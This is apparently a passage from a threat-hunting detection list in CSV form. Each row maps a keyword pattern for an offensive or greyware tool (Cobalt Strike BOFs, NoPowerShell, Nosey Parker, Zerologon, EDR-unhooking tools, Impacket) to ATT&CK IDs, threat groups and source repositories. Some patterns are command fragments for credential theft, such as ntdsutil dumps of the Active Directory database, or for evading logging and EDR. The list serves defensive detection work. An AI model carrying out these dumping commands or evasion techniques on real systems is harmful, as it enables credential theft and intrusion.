An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell/*.cs*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell_trunk.zip*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell32.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell64.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*--no-promiscuous-mode*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*normal/randomized.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*northdata-get-company-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*noseyparker report --datastore *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker scan --datastore *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker summarize --datastore *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker-cli*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential 
Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker-main*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker-v*-universal-macos*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*noseyparker-v*-x86_64-unknown-linux-gnu*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"*Nosql-Exploitation-Framework*","offensive_tool_keyword","Nosql-Exploitation-Framework","A FrameWork For NoSQL Scanning and Exploitation Framework","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Frameworks","https://github.com/torque59/Nosql-Exploitation-Framework","1","1","N/A","N/A","6","594","158","2023-09-26T11:50:30Z","2013-12-26T17:46:11Z" +"*NoSQLMap*","offensive_tool_keyword","NoSQLMap","Automated NoSQL database enumeration and web application exploitation tool.","T1190 - T1210 - T1506","TA0002 - TA0007 - 
TA0040","N/A","N/A","Frameworks","https://github.com/codingo/NoSQLMap","1","0","N/A","N/A","10","2534","568","2023-09-29T03:29:49Z","2013-09-24T15:01:30Z" +"*notepad FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*notredamecheatstowin>*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*novelbfh.zip*","offensive_tool_keyword","novelbfh","Brute force Novell hacking tool -- Circa 1993","T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" +"*--noWAIT --noFUNC --donut --rehash n --silent -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*npgimkapccfidfkfoklhpkgmhgfejhbj*","greyware_tool_keyword","BelkaVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*nping 
*","offensive_tool_keyword","nping","Nping is an open source tool for network packet generation. response analysis and response time measurement. Nping can generate network packets for a wide range of protocols. allowing users full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts. it can also be used as a raw packet generator for network stack stress testing. ARP poisoning. Denial of Service attacks. route tracing. etc. Npings novel echo mode lets users see how packets change in transit between the source and destination hosts. Thats a great way to understand firewall rules. detect packet corruption. and more","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://nmap.org/nping/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*nps whoami*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - 
Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
+"*nps whoami*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
+"*nps_payload*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance. 
It utilizes publicly demonstrated techniques from several different sources.","T1059.007 - T1218.001 - T1027.002","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z"
+"*nps_payload.py*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z"
+"*nps_payload-master*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z"
+"*nrf24-scanner.py -l -v*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*nrpc.py*","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","0","N/A","N/A","1","9","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z"
+"*nse_install.py*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" 
+"*nse-insall-0.0.1*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
+"*nse-install *","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
+"*nse-install-master*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
+"*nselib/data/passwords.lst*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*ntcreatethread.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*ntcreatethread.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*NtCreateUserProcessShellcode*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,,
+"*ntdissector 
-*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
+"*ntdissector-main*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
+"*Ntdll_SusProcess.*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z"
+"*NTDLLReflection-main*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z"
+"*NtdllUnpatcher.cpp*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" 
+"*NtdllUnpatcher.dll*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z"
+"*NtdllUnpatcher.lib*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z"
+"*NtdllUnpatcher.log*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z"
+"*NtdllUnpatcher.obj*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z"
+"*NtdllUnpatcher.sln*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z"
+"*NtdllUnpatcher_Injector*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z"
+"*NtdllUnpatcher-master*","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","142","30","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z"
+"*ntds/ntds.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
+"*ntds_grabber.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ntdsdump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*NTDSgrab.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ntdsutil *ac i ntds* *create full*\temp*","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0005 - TA0003 - TA0002","N/A","N/A","Credential Access","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*ntdsutil.exe *ac i ntds*ifm*create full *temp*","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0005 - TA0003 - TA0002","N/A","N/A","Credential Access","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*ntfs-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*nth --text 5f4dcc3b5aa765d61d8327deb882cf99*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*ntlm.py *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*ntlm_info_enumeration.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
